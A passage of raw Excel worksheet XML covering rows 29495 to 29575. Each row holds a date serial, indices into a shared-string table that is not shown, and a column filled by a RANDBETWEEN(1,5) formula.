      <c r="E29495" s="2" t="s">
        <v>26909</v>
      </c>
      <c r="F29495">
        <f t="shared" ca="1" si="460"/>
        <v>5</v>
      </c>
    </row>
    <row r="29496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29496" s="1">
        <v>42816.715069444443</v>
      </c>
      <c r="C29496" t="s">
        <v>10</v>
      </c>
      <c r="D29496" t="s">
        <v>290</v>
      </c>
      <c r="E29496" t="s">
        <v>26910</v>
      </c>
      <c r="F29496">
        <f t="shared" ca="1" si="460"/>
        <v>5</v>
      </c>
    </row>
    <row r="29497" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29497" s="1">
        <v>42816.666875000003</v>
      </c>
      <c r="C29497" t="s">
        <v>50</v>
      </c>
      <c r="E29497" s="2" t="s">
        <v>26911</v>
      </c>
      <c r="F29497">
        <f t="shared" ca="1" si="460"/>
        <v>4</v>
      </c>
    </row>
    <row r="29498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29498" s="1">
        <v>42816.654456018521</v>
      </c>
      <c r="C29498" t="s">
        <v>71</v>
      </c>
      <c r="E29498" t="s">
        <v>26912</v>
      </c>
      <c r="F29498">
        <f t="shared" ca="1" si="460"/>
        <v>3</v>
      </c>
    </row>
    <row r="29499" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A29499" s="1">
        <v>42816.653854166667</v>
      </c>
      <c r="C29499" t="s">
        <v>10</v>
      </c>
      <c r="D29499" t="s">
        <v>33</v>
      </c>
      <c r="E29499" s="2" t="s">
        <v>26913</v>
      </c>
      <c r="F29499">
        <f t="shared" ca="1" si="460"/>
        <v>5</v>
      </c>
    </row>
    <row r="29500" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29500" s="1">
        <v>42816.644930555558</v>
      </c>
      <c r="C29500" t="s">
        <v>708</v>
      </c>
      <c r="D29500" t="s">
        <v>312</v>
      </c>
      <c r="E29500" s="2" t="s">
        <v>26914</v>
      </c>
      <c r="F29500">
        <f t="shared" ca="1" si="460"/>
        <v>3</v>
      </c>
    </row>
    <row r="29501" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29501" s="1">
        <v>42816.636076388888</v>
      </c>
      <c r="C29501" t="s">
        <v>10</v>
      </c>
      <c r="D29501" t="s">
        <v>6</v>
      </c>
      <c r="E29501" s="2" t="s">
        <v>26915</v>
      </c>
      <c r="F29501">
        <f t="shared" ca="1" si="460"/>
        <v>2</v>
      </c>
    </row>
    <row r="29502" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29502" s="1">
        <v>42816.585555555554</v>
      </c>
      <c r="C29502" t="s">
        <v>65</v>
      </c>
      <c r="E29502" s="2" t="s">
        <v>26916</v>
      </c>
      <c r="F29502">
        <f t="shared" ca="1" si="460"/>
        <v>4</v>
      </c>
    </row>
    <row r="29503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29503" s="1">
        <v>42816.565439814818</v>
      </c>
      <c r="C29503" t="s">
        <v>48</v>
      </c>
      <c r="E29503" t="s">
        <v>26917</v>
      </c>
      <c r="F29503">
        <f t="shared" ca="1" si="460"/>
        <v>1</v>
      </c>
    </row>
    <row r="29504" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29504" s="1">
        <v>42816.562384259261</v>
      </c>
      <c r="C29504" t="s">
        <v>10</v>
      </c>
      <c r="D29504" t="s">
        <v>6</v>
      </c>
      <c r="E29504" t="s">
        <v>26918</v>
      </c>
      <c r="F29504">
        <f t="shared" ca="1" si="460"/>
        <v>2</v>
      </c>
    </row>
    <row r="29505" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29505" s="1">
        <v>42816.556400462963</v>
      </c>
      <c r="C29505" t="s">
        <v>10</v>
      </c>
      <c r="D29505" t="s">
        <v>632</v>
      </c>
      <c r="E29505" t="s">
        <v>26919</v>
      </c>
      <c r="F29505">
        <f t="shared" ca="1" si="460"/>
        <v>4</v>
      </c>
    </row>
    <row r="29506" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29506" s="1">
        <v>42816.550578703704</v>
      </c>
      <c r="C29506" t="s">
        <v>71</v>
      </c>
      <c r="E29506" s="2" t="s">
        <v>26920</v>
      </c>
      <c r="F29506">
        <f t="shared" ref="F29506:F29569" ca="1" si="461">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="29507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29507" s="1">
        <v>42816.550023148149</v>
      </c>
      <c r="C29507" t="s">
        <v>10</v>
      </c>
      <c r="D29507" t="s">
        <v>33</v>
      </c>
      <c r="E29507" t="s">
        <v>26921</v>
      </c>
      <c r="F29507">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29508" s="1">
        <v>42816.537731481483</v>
      </c>
      <c r="C29508" t="s">
        <v>10</v>
      </c>
      <c r="D29508" t="s">
        <v>163</v>
      </c>
      <c r="E29508" t="s">
        <v>26922</v>
      </c>
      <c r="F29508">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29509" s="1">
        <v>42816.492002314815</v>
      </c>
      <c r="C29509" t="s">
        <v>6</v>
      </c>
      <c r="D29509" t="s">
        <v>114</v>
      </c>
      <c r="E29509" t="s">
        <v>26923</v>
      </c>
      <c r="F29509">
        <f t="shared" ca="1" si="461"/>
        <v>4</v>
      </c>
    </row>
    <row r="29510" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A29510" s="1">
        <v>42816.44939814815</v>
      </c>
      <c r="C29510" t="s">
        <v>10</v>
      </c>
      <c r="D29510" t="s">
        <v>46</v>
      </c>
      <c r="E29510" s="2" t="s">
        <v>26924</v>
      </c>
      <c r="F29510">
        <f t="shared" ca="1" si="461"/>
        <v>4</v>
      </c>
    </row>
    <row r="29511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29511" s="1">
        <v>42816.437337962961</v>
      </c>
      <c r="C29511" t="s">
        <v>10</v>
      </c>
      <c r="D29511" t="s">
        <v>178</v>
      </c>
      <c r="E29511" t="s">
        <v>26925</v>
      </c>
      <c r="F29511">
        <f t="shared" ca="1" si="461"/>
        <v>4</v>
      </c>
    </row>
    <row r="29512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29512" s="1">
        <v>42816.436585648145</v>
      </c>
      <c r="C29512" t="s">
        <v>10</v>
      </c>
      <c r="E29512" t="s">
        <v>26926</v>
      </c>
      <c r="F29512">
        <f t="shared" ca="1" si="461"/>
        <v>1</v>
      </c>
    </row>
    <row r="29513" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29513" s="1">
        <v>42816.431990740741</v>
      </c>
      <c r="C29513" t="s">
        <v>65</v>
      </c>
      <c r="E29513" s="2" t="s">
        <v>26927</v>
      </c>
      <c r="F29513">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29514" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29514" s="1">
        <v>42816.405092592591</v>
      </c>
      <c r="C29514" t="s">
        <v>10</v>
      </c>
      <c r="D29514" t="s">
        <v>112</v>
      </c>
      <c r="E29514" t="s">
        <v>26928</v>
      </c>
      <c r="F29514">
        <f t="shared" ca="1" si="461"/>
        <v>1</v>
      </c>
    </row>
    <row r="29515" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29515" s="1">
        <v>42816.402245370373</v>
      </c>
      <c r="C29515" t="s">
        <v>71</v>
      </c>
      <c r="E29515" s="2" t="s">
        <v>26929</v>
      </c>
      <c r="F29515">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29516" s="1">
        <v>42816.388078703705</v>
      </c>
      <c r="C29516" t="s">
        <v>71</v>
      </c>
      <c r="E29516" t="s">
        <v>26930</v>
      </c>
      <c r="F29516">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29517" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29517" s="1">
        <v>42816.386979166666</v>
      </c>
      <c r="C29517" t="s">
        <v>10</v>
      </c>
      <c r="D29517" t="s">
        <v>374</v>
      </c>
      <c r="E29517" t="s">
        <v>26931</v>
      </c>
      <c r="F29517">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29518" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29518" s="1">
        <v>42816.370740740742</v>
      </c>
      <c r="C29518" t="s">
        <v>10</v>
      </c>
      <c r="D29518" t="s">
        <v>494</v>
      </c>
      <c r="E29518" t="s">
        <v>26932</v>
      </c>
      <c r="F29518">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29519" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29519" s="1">
        <v>42816.349780092591</v>
      </c>
      <c r="C29519" t="s">
        <v>41</v>
      </c>
      <c r="E29519" s="2" t="s">
        <v>26933</v>
      </c>
      <c r="F29519">
        <f t="shared" ca="1" si="461"/>
        <v>4</v>
      </c>
    </row>
    <row r="29520" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A29520" s="1">
        <v>42816.326331018521</v>
      </c>
      <c r="C29520" t="s">
        <v>48</v>
      </c>
      <c r="E29520" s="2" t="s">
        <v>26934</v>
      </c>
      <c r="F29520">
        <f t="shared" ca="1" si="461"/>
        <v>4</v>
      </c>
    </row>
    <row r="29521" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29521" s="1">
        <v>42816.310370370367</v>
      </c>
      <c r="C29521" t="s">
        <v>8872</v>
      </c>
      <c r="E29521" s="2" t="s">
        <v>26935</v>
      </c>
      <c r="F29521">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29522" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29522" s="1">
        <v>42816.280428240738</v>
      </c>
      <c r="C29522" t="s">
        <v>48</v>
      </c>
      <c r="E29522" t="s">
        <v>26936</v>
      </c>
      <c r="F29522">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29523" s="1">
        <v>42816.265277777777</v>
      </c>
      <c r="C29523" t="s">
        <v>48</v>
      </c>
      <c r="E29523" t="s">
        <v>26937</v>
      </c>
      <c r="F29523">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29524" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A29524" s="1">
        <v>42816.250486111108</v>
      </c>
      <c r="C29524" t="s">
        <v>65</v>
      </c>
      <c r="E29524" s="2" t="s">
        <v>26938</v>
      </c>
      <c r="F29524">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29525" s="1">
        <v>42816.224039351851</v>
      </c>
      <c r="C29525" t="s">
        <v>48</v>
      </c>
      <c r="E29525" t="s">
        <v>26939</v>
      </c>
      <c r="F29525">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29526" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29526" s="1">
        <v>42816.22179398148</v>
      </c>
      <c r="C29526" t="s">
        <v>1381</v>
      </c>
      <c r="E29526" s="2" t="s">
        <v>26940</v>
      </c>
      <c r="F29526">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29527" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A29527" s="1">
        <v>42816.202060185184</v>
      </c>
      <c r="C29527" t="s">
        <v>124</v>
      </c>
      <c r="E29527" s="2" t="s">
        <v>26941</v>
      </c>
      <c r="F29527">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29528" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29528" s="1">
        <v>42816.189212962963</v>
      </c>
      <c r="C29528" t="s">
        <v>10</v>
      </c>
      <c r="D29528" t="s">
        <v>271</v>
      </c>
      <c r="E29528" t="s">
        <v>26942</v>
      </c>
      <c r="F29528">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29529" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A29529" s="1">
        <v>42816.109756944446</v>
      </c>
      <c r="C29529" t="s">
        <v>17</v>
      </c>
      <c r="E29529" s="2" t="s">
        <v>26943</v>
      </c>
      <c r="F29529">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29530" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29530" s="1">
        <v>42816.007280092592</v>
      </c>
      <c r="C29530" t="s">
        <v>6</v>
      </c>
      <c r="D29530" t="s">
        <v>25</v>
      </c>
      <c r="E29530" s="2" t="s">
        <v>26944</v>
      </c>
      <c r="F29530">
        <f t="shared" ca="1" si="461"/>
        <v>1</v>
      </c>
    </row>
    <row r="29531" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29531" s="1">
        <v>42815.771284722221</v>
      </c>
      <c r="C29531" t="s">
        <v>16</v>
      </c>
      <c r="E29531" s="2" t="s">
        <v>26945</v>
      </c>
      <c r="F29531">
        <f t="shared" ca="1" si="461"/>
        <v>4</v>
      </c>
    </row>
    <row r="29532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29532" s="1">
        <v>42815.766782407409</v>
      </c>
      <c r="C29532" t="s">
        <v>10</v>
      </c>
      <c r="D29532" t="s">
        <v>94</v>
      </c>
      <c r="E29532" t="s">
        <v>26946</v>
      </c>
      <c r="F29532">
        <f t="shared" ca="1" si="461"/>
        <v>1</v>
      </c>
    </row>
    <row r="29533" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29533" s="1">
        <v>42815.758020833331</v>
      </c>
      <c r="C29533" t="s">
        <v>280</v>
      </c>
      <c r="E29533" t="s">
        <v>26947</v>
      </c>
      <c r="F29533">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29534" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29534" s="1">
        <v>42815.747789351852</v>
      </c>
      <c r="C29534" t="s">
        <v>10</v>
      </c>
      <c r="D29534" t="s">
        <v>89</v>
      </c>
      <c r="E29534" t="s">
        <v>26948</v>
      </c>
      <c r="F29534">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29535" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29535" s="1">
        <v>42815.624363425923</v>
      </c>
      <c r="C29535" t="s">
        <v>41</v>
      </c>
      <c r="E29535" s="2" t="s">
        <v>26949</v>
      </c>
      <c r="F29535">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29536" s="1">
        <v>42815.621944444443</v>
      </c>
      <c r="C29536" t="s">
        <v>10</v>
      </c>
      <c r="D29536" t="s">
        <v>6</v>
      </c>
      <c r="E29536" t="s">
        <v>26950</v>
      </c>
      <c r="F29536">
        <f t="shared" ca="1" si="461"/>
        <v>1</v>
      </c>
    </row>
    <row r="29537" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29537" s="1">
        <v>42815.587719907409</v>
      </c>
      <c r="C29537" t="s">
        <v>10</v>
      </c>
      <c r="D29537" t="s">
        <v>151</v>
      </c>
      <c r="E29537" t="s">
        <v>26951</v>
      </c>
      <c r="F29537">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29538" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29538" s="1">
        <v>42815.571689814817</v>
      </c>
      <c r="C29538" t="s">
        <v>10</v>
      </c>
      <c r="D29538" t="s">
        <v>6</v>
      </c>
      <c r="E29538" t="s">
        <v>26952</v>
      </c>
      <c r="F29538">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29539" s="1">
        <v>42815.549745370372</v>
      </c>
      <c r="C29539" t="s">
        <v>10</v>
      </c>
      <c r="D29539" t="s">
        <v>192</v>
      </c>
      <c r="E29539" t="s">
        <v>26953</v>
      </c>
      <c r="F29539">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29540" s="1">
        <v>42815.533263888887</v>
      </c>
      <c r="C29540" t="s">
        <v>10</v>
      </c>
      <c r="D29540" t="s">
        <v>23</v>
      </c>
      <c r="E29540" t="s">
        <v>26954</v>
      </c>
      <c r="F29540">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29541" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29541" s="1">
        <v>42815.533229166664</v>
      </c>
      <c r="C29541" t="s">
        <v>10</v>
      </c>
      <c r="D29541" t="s">
        <v>107</v>
      </c>
      <c r="E29541" s="2" t="s">
        <v>26955</v>
      </c>
      <c r="F29541">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29542" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29542" s="1">
        <v>42815.528877314813</v>
      </c>
      <c r="C29542" t="s">
        <v>10</v>
      </c>
      <c r="D29542" t="s">
        <v>178</v>
      </c>
      <c r="E29542" t="s">
        <v>26956</v>
      </c>
      <c r="F29542">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29543" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29543" s="1">
        <v>42815.528425925928</v>
      </c>
      <c r="C29543" t="s">
        <v>10</v>
      </c>
      <c r="D29543" t="s">
        <v>56</v>
      </c>
      <c r="E29543" t="s">
        <v>26957</v>
      </c>
      <c r="F29543">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29544" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29544" s="1">
        <v>42815.517592592594</v>
      </c>
      <c r="C29544" t="s">
        <v>10</v>
      </c>
      <c r="D29544" t="s">
        <v>80</v>
      </c>
      <c r="E29544" t="s">
        <v>26958</v>
      </c>
      <c r="F29544">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29545" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29545" s="1">
        <v>42815.517268518517</v>
      </c>
      <c r="C29545" t="s">
        <v>559</v>
      </c>
      <c r="E29545" s="2" t="s">
        <v>26959</v>
      </c>
      <c r="F29545">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29546" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29546" s="1">
        <v>42815.504374999997</v>
      </c>
      <c r="C29546" t="s">
        <v>10</v>
      </c>
      <c r="D29546" t="s">
        <v>721</v>
      </c>
      <c r="E29546" t="s">
        <v>26960</v>
      </c>
      <c r="F29546">
        <f t="shared" ca="1" si="461"/>
        <v>4</v>
      </c>
    </row>
    <row r="29547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29547" s="1">
        <v>42815.493541666663</v>
      </c>
      <c r="C29547" t="s">
        <v>10</v>
      </c>
      <c r="D29547" t="s">
        <v>41</v>
      </c>
      <c r="E29547" t="s">
        <v>26961</v>
      </c>
      <c r="F29547">
        <f t="shared" ca="1" si="461"/>
        <v>4</v>
      </c>
    </row>
    <row r="29548" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29548" s="1">
        <v>42815.486921296295</v>
      </c>
      <c r="C29548" t="s">
        <v>48</v>
      </c>
      <c r="E29548" t="s">
        <v>26962</v>
      </c>
      <c r="F29548">
        <f t="shared" ca="1" si="461"/>
        <v>4</v>
      </c>
    </row>
    <row r="29549" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29549" s="1">
        <v>42815.477870370371</v>
      </c>
      <c r="C29549" t="s">
        <v>48</v>
      </c>
      <c r="E29549" t="s">
        <v>26963</v>
      </c>
      <c r="F29549">
        <f t="shared" ca="1" si="461"/>
        <v>4</v>
      </c>
    </row>
    <row r="29550" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29550" s="1">
        <v>42815.439629629633</v>
      </c>
      <c r="C29550" t="s">
        <v>97</v>
      </c>
      <c r="E29550" s="2" t="s">
        <v>26964</v>
      </c>
      <c r="F29550">
        <f t="shared" ca="1" si="461"/>
        <v>1</v>
      </c>
    </row>
    <row r="29551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29551" s="1">
        <v>42815.433449074073</v>
      </c>
      <c r="C29551" t="s">
        <v>6</v>
      </c>
      <c r="D29551" t="s">
        <v>194</v>
      </c>
      <c r="E29551" t="s">
        <v>26965</v>
      </c>
      <c r="F29551">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29552" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29552" s="1">
        <v>42815.418009259258</v>
      </c>
      <c r="C29552" t="s">
        <v>41</v>
      </c>
      <c r="E29552" t="s">
        <v>26966</v>
      </c>
      <c r="F29552">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29553" s="1">
        <v>42815.406574074077</v>
      </c>
      <c r="C29553" t="s">
        <v>10</v>
      </c>
      <c r="D29553" t="s">
        <v>163</v>
      </c>
      <c r="E29553" t="s">
        <v>26967</v>
      </c>
      <c r="F29553">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29554" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A29554" s="1">
        <v>42815.403067129628</v>
      </c>
      <c r="C29554" t="s">
        <v>71</v>
      </c>
      <c r="E29554" s="2" t="s">
        <v>26968</v>
      </c>
      <c r="F29554">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29555" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29555" s="1">
        <v>42815.368425925924</v>
      </c>
      <c r="C29555" t="s">
        <v>1050</v>
      </c>
      <c r="E29555" s="2" t="s">
        <v>26969</v>
      </c>
      <c r="F29555">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29556" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A29556" s="1">
        <v>42815.35359953704</v>
      </c>
      <c r="C29556" t="s">
        <v>65</v>
      </c>
      <c r="E29556" s="2" t="s">
        <v>26970</v>
      </c>
      <c r="F29556">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29557" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29557" s="1">
        <v>42815.34165509259</v>
      </c>
      <c r="C29557" t="s">
        <v>10</v>
      </c>
      <c r="D29557" t="s">
        <v>86</v>
      </c>
      <c r="E29557" s="2" t="s">
        <v>26971</v>
      </c>
      <c r="F29557">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29558" s="1">
        <v>42815.340520833335</v>
      </c>
      <c r="C29558" t="s">
        <v>10</v>
      </c>
      <c r="D29558" t="s">
        <v>86</v>
      </c>
      <c r="F29558">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29559" s="1">
        <v>42815.336006944446</v>
      </c>
      <c r="C29559" t="s">
        <v>6</v>
      </c>
      <c r="D29559" t="s">
        <v>7</v>
      </c>
      <c r="E29559" t="s">
        <v>26972</v>
      </c>
      <c r="F29559">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29560" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A29560" s="1">
        <v>42815.335682870369</v>
      </c>
      <c r="C29560" t="s">
        <v>10</v>
      </c>
      <c r="D29560" t="s">
        <v>36</v>
      </c>
      <c r="E29560" s="2" t="s">
        <v>26973</v>
      </c>
      <c r="F29560">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29561" s="1">
        <v>42815.328425925924</v>
      </c>
      <c r="C29561" t="s">
        <v>410</v>
      </c>
      <c r="D29561" t="s">
        <v>312</v>
      </c>
      <c r="E29561" t="s">
        <v>26974</v>
      </c>
      <c r="F29561">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29562" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29562" s="1">
        <v>42815.287858796299</v>
      </c>
      <c r="C29562" t="s">
        <v>65</v>
      </c>
      <c r="E29562" s="2" t="s">
        <v>26975</v>
      </c>
      <c r="F29562">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29563" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29563" s="1">
        <v>42815.287314814814</v>
      </c>
      <c r="C29563" t="s">
        <v>454</v>
      </c>
      <c r="E29563" t="s">
        <v>26976</v>
      </c>
      <c r="F29563">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29564" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A29564" s="1">
        <v>42815.242546296293</v>
      </c>
      <c r="C29564" t="s">
        <v>124</v>
      </c>
      <c r="E29564" s="2" t="s">
        <v>26977</v>
      </c>
      <c r="F29564">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29565" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29565" s="1">
        <v>42815.164652777778</v>
      </c>
      <c r="C29565" t="s">
        <v>71</v>
      </c>
      <c r="E29565" s="2" t="s">
        <v>26978</v>
      </c>
      <c r="F29565">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29566" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29566" s="1">
        <v>42815.157777777778</v>
      </c>
      <c r="C29566" t="s">
        <v>50</v>
      </c>
      <c r="E29566" s="2" t="s">
        <v>26979</v>
      </c>
      <c r="F29566">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29567" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29567" s="1">
        <v>42815.156828703701</v>
      </c>
      <c r="C29567" t="s">
        <v>50</v>
      </c>
      <c r="E29567" s="2" t="s">
        <v>26979</v>
      </c>
      <c r="F29567">
        <f t="shared" ca="1" si="461"/>
        <v>5</v>
      </c>
    </row>
    <row r="29568" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A29568" s="1">
        <v>42815.149328703701</v>
      </c>
      <c r="C29568" t="s">
        <v>65</v>
      </c>
      <c r="E29568" s="2" t="s">
        <v>26980</v>
      </c>
      <c r="F29568">
        <f t="shared" ca="1" si="461"/>
        <v>3</v>
      </c>
    </row>
    <row r="29569" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29569" s="1">
        <v>42815.05363425926</v>
      </c>
      <c r="C29569" t="s">
        <v>139</v>
      </c>
      <c r="F29569">
        <f t="shared" ca="1" si="461"/>
        <v>2</v>
      </c>
    </row>
    <row r="29570" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29570" s="1">
        <v>42815.05190972222</v>
      </c>
      <c r="C29570" t="s">
        <v>140</v>
      </c>
      <c r="E29570" t="s">
        <v>26981</v>
      </c>
      <c r="F29570">
        <f t="shared" ref="F29570:F29633" ca="1" si="462">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="29571" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29571" s="1">
        <v>42815.014479166668</v>
      </c>
      <c r="C29571" t="s">
        <v>144</v>
      </c>
      <c r="E29571" t="s">
        <v>26982</v>
      </c>
      <c r="F29571">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29572" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29572" s="1">
        <v>42814.995324074072</v>
      </c>
      <c r="C29572" t="s">
        <v>139</v>
      </c>
      <c r="E29572" s="2" t="s">
        <v>26983</v>
      </c>
      <c r="F29572">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29573" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A29573" s="1">
        <v>42814.824328703704</v>
      </c>
      <c r="C29573" t="s">
        <v>144</v>
      </c>
      <c r="E29573" s="2" t="s">
        <v>26984</v>
      </c>
      <c r="F29573">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29574" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29574" s="1">
        <v>42814.794351851851</v>
      </c>
      <c r="C29574" t="s">
        <v>10</v>
      </c>
      <c r="D29574" t="s">
        <v>6</v>
      </c>
      <c r="E29574" s="2" t="s">
        <v>26985</v>
      </c>
      <c r="F29574">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29575" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29575" s="1">
